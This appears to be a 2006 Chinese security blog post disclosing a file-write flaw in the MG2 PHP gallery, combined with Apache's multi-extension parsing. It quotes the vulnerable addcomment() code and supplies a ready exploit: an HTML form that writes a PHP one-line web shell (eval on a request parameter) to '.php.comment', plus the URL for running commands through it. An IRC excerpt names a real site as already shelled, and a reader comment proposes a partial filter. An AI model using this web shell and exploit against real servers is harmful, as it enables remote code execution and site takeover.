Apache最新安全漏洞与利用

信息来源:红狼安全小组(www.wolfexp.net,www.crst.com.cn)
Apache最新安全漏洞与利用
Bug Find By Cooldiyer @ 2006/12/13 15:05
描述: 任意以.php开头的文件名,Apache都当做php文件解析

如”.php.comment”将被当做php文件解析,由此引发一系列漏洞.

MG2是在国外非常流行的一个PHP+HTML的图片管理程序,由于商业版被破解,程序流传甚广,
在google搜索关键字为”owered by MG2 v0.5.1″
最新版本存在着文件写入漏洞,可配和Apache漏洞直接得shell

includes/mg2_functions.php中addcomment()函数如下

function addcomment() {
$_REQUEST['filename'] = $this->charfix($_REQUEST['filename']);
$_REQUEST['input'] = $this->charfix($_REQUEST['input']);
$_REQUEST['email'] = $this->charfix($_REQUEST['email']);
$_REQUEST['name'] = $this->charfix($_REQUEST['name']);
$_REQUEST['input'] = strip_tags($_REQUEST['input'], "<b></b><i></i><u></u><strong></strong><em></em>");
$_REQUEST['input'] = str_replace("\n","<br />",$_REQUEST['input']);
$_REQUEST['input'] = str_replace("\r","",$_REQUEST['input']);
if ($_REQUEST['input'] != "" && $_REQUEST['name'] != "" && $_REQUEST['email'] != "") {
$this->readcomments("pictures/" . $_REQUEST['filename'] . ".comment");
$comment_exists = $this->select($_REQUEST['input'],$this->comments,3,1,0);
$comment_exists = $this->select($_REQUEST['name'],$comment_exists,1,1,0);
$comment_exists = $this->select($_REQUEST['email'],$comment_exists,2,1,0);
if (count($comment_exists) == 0) {
$this->comments[] = array(time(), $_REQUEST['name'], $_REQUEST['email'], $_REQUEST['input']);
$this->writecomments($_REQUEST['filename'] . ".comment");
........

漏洞很明显,可以自定义comment的文件名,如果你自定义的filename为”.php”,那么程序就会在
图片根目录下生成一个”.php.comment”的文件,由于Apache的漏洞,该程序被当做php文件解析,webshell就到手了,
写了个利用程序如下:

<form action="http://localhost/mg2/index.php" method="post">
<input type=hidden name="input" value="You Are Owned">
<input type=hidden name="email" value="[email protected]">
<input type=hidden name="filename" value=".php">
<input type="hidden" name="action" value="addcomment">
<textarea name="name" cols=30 rows=10>
<?eval($_REQUEST[cmd])?>
</textarea><br>
<input type="submit" value="Get A Shell">
</form>

提交后就会在图片根目录下生成一个含一句话木马的文件”.php.comment”
http://localhost/mg2/pictures/.php.comment?cmd=phpinfo();

注:由此引发的任何安全问题与cooldiyer无关
偶发现漏洞后在IRC聊天室跟一些高手交流的片断

15:36 < cooldiyer> “.php.comment” will be
15:37 < dilch> he’s right, i’ve just tried it
15:37 < cooldiyer> you can see :
http://www.aregak.net/pictures/.php.comment?cmd=phpinfo();
15:37 < dilch> with 2 other sites
15:37 < cooldiyer> I just find this bug this time -:/
15:38 < zircu> cooldiyer: i would be talking to mg2 about this instead of
complaining about it here
15:38 < dilch> St3althy, well i’ve given you everything, now google
15:38 < dilch> St3althy, and apologize to zircu
15:38 < cooldiyer> thanks …
15:39 < colder> I’d stop using mg2 as they obviously use crappy code, too.
15:39 < St3althy> i am so sorry zircu, can you ever forgive me?
15:39 < zircu> St3althy: for?
15:39 < St3althy> calling you a dick
15:40 < TML> cooldiyer: That’s not a bug, it’s a feature of apache.
15:41 < cooldiyer> feature of apache ?
15:41 < TML> cooldiyer: Yes. It’s known as content negotiation
15:41 < TML> cooldiyer: So that you can have index.php.en and index.php.fr and
requests for index.php will get a reasonable file.
15:41 < zircu> ah like /foo.html.EN
15:41 < zircu> yeah it is trying to figure out what you really meant
15:42 < TML> In this specific example, you would have a different index.php for
English users than for French users, and Apache would choose the
right file.
15:42 < zircu> much like if you do /foo.php/something
15:42 < cooldiyer> can addtype at httpd.conf ?
15:43 < TML> cooldiyer: It has nothing to do with addtype
15:43 < cooldiyer> oh, Apache support now ?
15:43 < cooldiyer> I will have a try now

偶知道了index.php.en,index.php.fr等都可以当做PHP解析,郁闷。。。。

相关日志

抢楼还有机会... 抢座Rss 2.0或者 Trackback

  • reistlin

    $_REQUEST[‘name’] = str_replace( ‘.php’ , ‘.reistlin.com’ , strtolower( $this->charfix($_REQUEST[‘name’] );

    By Iwege

发表评论